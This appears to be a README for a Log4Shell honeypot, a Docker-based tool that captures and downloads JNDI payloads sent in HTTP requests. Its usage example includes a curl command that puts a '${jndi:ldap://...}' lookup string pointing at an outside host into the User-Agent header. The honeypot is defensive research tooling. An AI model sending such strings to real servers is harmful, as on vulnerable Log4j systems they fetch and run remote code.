Catch and download log4shell payloads sent within HTTP headers, query parameters or POST data. Modified version of Adikso's minecraft honeypot
git clone $repodocker-compose up- Send payloads within a http header to
$dockerip:$port
To add additional honeypots on different ports, copy and paste an existing service within docker-compose.yml, changing the service name, and alter the ports within ports and command.
curl --user-agent '${jndi:ldap://lmao.com:1389/a}' http://localhost:80Payloads are saved within payloads/
Logs are printed to the screen by default, but can be retreived with docker inspect. e.g:
docker inspect --format='{{.LogPath}}' log4shell-honeypot_http_1 | xargs cat